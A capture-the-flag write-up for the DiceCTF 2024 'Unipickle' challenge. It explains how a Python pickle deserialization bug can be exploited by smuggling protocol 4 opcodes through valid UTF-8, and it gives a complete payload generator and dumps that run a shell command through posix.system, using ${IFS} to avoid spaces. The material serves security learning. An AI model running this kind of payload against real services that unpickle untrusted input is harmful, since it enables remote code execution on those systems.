DiceCTF 2024 qualifications Unipickle Writeup

Published: September 18, 2025, updated: September 18, 2025

The challenge server runs a Python script called unipickle.py with the following code:

#!/usr/local/bin/python
import pickle
pickle.loads(input("pickle: ").split()[0].encode())

The Python script performs the following steps:

  1. Prompt the user for one line of input with the prompt pickle: .
  2. Receive the input as a Unicode string (str).
  3. Split the string on whitespace.
  4. Take the first part.
  5. Encode that part as UTF-8 to get a bytes object.
  6. Call pickle.loads() on the resulting bytes object.

To solve the challenge, you need to pass a valid Unicode string that contains no whitespace. Once the script has encoded that string as UTF-8, the resulting bytes object must be something that pickle.loads() can work with.
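Steps 2 to 5 can be reproduced locally without unpickling anything. The following is a minimal sketch; the helper name server_view is hypothetical and not part of the challenge.

```python
def server_view(user_input: str) -> bytes:
    """Return the bytes that unipickle.py would hand to pickle.loads()."""
    # Same expression as in unipickle.py, minus input() and pickle.loads().
    return user_input.split()[0].encode()


# Everything after the first whitespace character is dropped.
print(server_view("abc def"))   # b'abc'
# Characters above U+007F turn into multi-byte UTF-8 sequences.
print(server_view("\u0093"))    # b'\xc2\x93'
```

This makes it easy to check what a candidate input looks like by the time pickle sees it.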

Python pickle protocol versions

I’ve stored a pickled Python object in a file called uname.pickle. When you run pickle.loads() on this file’s contents, Python runs uname on your system.

Here’s what the contents of the pickle file look like when you print them with xxd:

00000000: 6370 6f73 6978 0a73 7973 7465 6d0a 2856  cposix.system.(V
00000010: 756e 616d 650a 7452 2e                   uname.tR.

You can visualize the contents of this Python pickle using the pickletools module with python3 -m pickletools:

python3 -m pickletools uname.pickle

This prints the following:

    0: c    GLOBAL     'posix system'
   14: (    MARK
   15: V        UNICODE    'uname'
   22: t        TUPLE      (MARK at 14)
   23: R    REDUCE
   24: .    STOP
highest protocol among opcodes = 0
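The same disassembly is available from Python through pickletools.genops(), which only parses the pickle and never executes it. A small sketch, assuming the payload bytes from the xxd dump above; the variable names are illustrative.

```python
import pickletools

# The 25 bytes from the xxd dump of uname.pickle.
uname_pickle = b"cposix\nsystem\n(Vuname\ntR."

# genops() yields (opcode, argument, position) for every opcode in the pickle.
opcodes = [(pos, op.name, arg) for op, arg, pos in pickletools.genops(uname_pickle)]
for pos, name, arg in opcodes:
    print(pos, name, arg)
```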

Python pickles come in several protocol versions. Protocol version 0 is useful for deserialization attacks because its opcodes are printable ASCII characters. Its text arguments are terminated by newlines.

In this challenge, however, unipickle.py only keeps the first whitespace-separated part of the input. Newlines count as whitespace, and input() reads only a single line anyway, so a version 0 payload is cut off at its first newline. That makes it difficult to work with version 0.
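To see the problem concretely, here is a sketch that feeds the version 0 payload from uname.pickle through the same transformation the server applies. The variable names are illustrative.

```python
proto0 = "cposix\nsystem\n(Vuname\ntR."

# input() returns at most one line, without the trailing newline.
first_line = proto0.split("\n")[0]
# unipickle.py then keeps only the first whitespace-separated part.
seen_by_pickle = first_line.split()[0].encode()
print(seen_by_pickle)  # b'cposix'
```

Only the GLOBAL opcode and the module name survive, so the pickle is incomplete.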

I instead chose to focus on understanding how I can create a protocol version 4 payload that still passes as valid UTF-8.

Smuggling higher values as Unicode characters

The trick is to smuggle version 4 protocol opcodes inside UTF-8 strings. This technique is called Unicode injection and belongs to a larger class of attacks called encoded injection.

UTF-8 encodes every code point as one of the following byte patterns, so any byte string built only from these patterns is valid UTF-8:

  1. 0xxx xxxx
  2. 110x xxxx 10xx xxxx
  3. 1110 xxxx 10xx xxxx 10xx xxxx
  4. 1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx
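The bit patterns can be checked against Python’s own encoder. A minimal sketch; utf8_bits is a hypothetical helper, and the sample characters are arbitrary picks for each sequence length.

```python
def utf8_bits(ch: str) -> str:
    """Show the UTF-8 encoding of one character as groups of eight bits."""
    return " ".join(f"{byte:08b}" for byte in ch.encode("utf-8"))


print(utf8_bits("A"))           # 01000001
print(utf8_bits("\u0093"))      # 11000010 10010011
print(utf8_bits("\u20ac"))      # 11100010 10000010 10101100
print(utf8_bits("\U0001f600"))  # 11110000 10011111 10011000 10000000
```

Note that any byte of 0x80 or above only appears as part of a multi-byte sequence, never on its own.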

As long as every byte of the version 4 payload, opcodes and arguments alike, is part of a valid UTF-8 sequence, and none of the decoded characters is whitespace, unipickle.py passes your input to pickle.loads() unchanged.
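This condition is easy to test before sending anything to the server. The following is a sketch under the assumption that the server does exactly what unipickle.py shows; survives_server is a hypothetical helper name.

```python
def survives_server(raw: bytes) -> bool:
    """True if raw reaches pickle.loads() byte for byte."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        # Not valid UTF-8, so it cannot be sent as a Unicode string.
        return False
    parts = text.split()
    # Any whitespace character would shorten or split the input.
    return len(parts) == 1 and parts[0].encode("utf-8") == raw


print(survives_server(b"q\xc2\x93"))    # True: c2 93 encodes U+0093
print(survives_server(b"\x93"))         # False: lone continuation byte
print(survives_server(b"\xc2\x85"))     # False: U+0085 counts as whitespace
print(survives_server(b"cposix\nsys"))  # False: contains a newline
```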

Note: ${IFS} helps keep unipickle.py from cutting off a command that contains spaces. The shell expands ${IFS} to its field separators, so it works as a space replacement in command injections. This is what head /flag* looks like with its space replaced by ${IFS}:

head${IFS}/flag*
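The replacement is a plain string substitution. A short sketch with illustrative variable names, showing that the result is a single whitespace-free token:

```python
command = "head /flag*"

# Swap every space for the shell variable that expands to whitespace.
no_spaces = command.replace(" ", "${IFS}")
print(no_spaces)               # head${IFS}/flag*
print(len(no_spaces.split()))  # 1
```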

Payload generator

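Here’s the payload generator. STACK_GLOBAL (0x93) has the bit pattern 1001 0011, which UTF-8 only allows as a continuation byte. The generator therefore puts BINPUT (q) in front of it: BINPUT takes a one-byte argument, here 0xc2, and the pair c2 93 is the UTF-8 encoding of U+0093. The string arguments use SHORT_BINSTRING (U), whose opcode and one-byte length both stay in the ASCII range: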

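#!/usr/bin/env python3
import math

# Push 'posix' and 'system' with SHORT_BINSTRING (U), then run STACK_GLOBAL
# (\x93). BINPUT (q) swallows \xc2 as its argument, so \xc2\x93 is valid UTF-8.
start = b'U\x05posixU\x06systemq\xc2\x93'

# TUPLE (t), REDUCE (R), STOP (.)
end = b'tR.'

# The shell expands ${IFS} to whitespace, so the payload itself contains none.
padding = "${IFS}"

# Lengths up to 32 risk a length byte that str.split() treats as whitespace
# (chr(32) is a space).
minimum_padded_length = 33

def make_payload(payload: str) -> bytes:
    payload = payload.replace(" ", padding)

    length = len(payload)
    # Keep the length byte a single-byte (ASCII) UTF-8 character.
    assert length < 124

    # Pad short commands with trailing ${IFS} up to the minimum length.
    missing = max(0, minimum_padded_length - length)
    add_padding_count = math.ceil(missing / len(padding))
    payload = payload + (padding * add_padding_count)

    # MARK, then SHORT_BINSTRING (U) with a one-byte length and the command.
    return start + f'(U{chr(len(payload))}{payload}'.encode() + end


payload = "head /flag*"
encoded = make_payload(payload).decode()
print(encoded)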
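One plausible reading of minimum_padded_length = 33 (my interpretation, the generator does not state it) is that the SHORT_BINSTRING length byte must not be a character that str.split() treats as whitespace. This sketch lists the single-byte values affected; the variable names are illustrative.

```python
# Length bytes below 128 that str.split() would treat as a separator.
whitespace_lengths = [n for n in range(128) if chr(n).isspace()]
print(whitespace_lengths)

# The first length from which no single-byte value is whitespace anymore.
smallest_safe_length = max(whitespace_lengths) + 1
print(smallest_safe_length)  # 33
```

Padding with ${IFS} raises the length of a short command without changing what the shell runs.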

Here’s the payload decoded with pickletools:

    0: U    SHORT_BINSTRING 'posix'
    7: U    SHORT_BINSTRING 'system'
   15: q    BINPUT     194
   17: \x93 STACK_GLOBAL
   18: (    MARK
   19: U        SHORT_BINSTRING 'head${IFS}/flag*${IFS}${IFS}${IFS}'
   55: t        TUPLE      (MARK at 18)
   56: R    REDUCE
   57: .    STOP
highest protocol among opcodes = 4
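The payload can also be checked end to end without running a shell command. This is a sketch, assuming the payload bytes from the disassembly above; Recorder is a hypothetical Unpickler subclass whose find_class() returns a harmless stand-in instead of the real posix.system.

```python
import io
import pickle

payload = b'U\x05posixU\x06systemq\xc2\x93(U"head${IFS}/flag*${IFS}${IFS}${IFS}tR.'

# Round-trip through the same transformation the server applies.
received = payload.decode().split()[0].encode()


class Recorder(pickle.Unpickler):
    def find_class(self, module, name):
        # Never import anything; just report what would have been called.
        return lambda *args: (module, name, args)


result = Recorder(io.BytesIO(received)).load()
print(result)
```

If received equals payload and the recorded call names posix.system with the expected command, the payload survives the server’s processing intact.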

This is what you’ll see when you pipe the payload generator’s output into xxd:

00000000: 5505 706f 7369 7855 0673 7973 7465 6d71  U.posixU.systemq
00000010: c293 2855 2268 6561 6424 7b49 4653 7d2f  ..(U"head${IFS}/
00000020: 666c 6167 2a24 7b49 4653 7d24 7b49 4653  flag*${IFS}${IFS
00000030: 7d24 7b49 4653 7d74 522e 0a              }${IFS}tR..

This challenge requires you to closely study Python’s pickle implementation and goes way beyond just blindly copying YAML payloads.
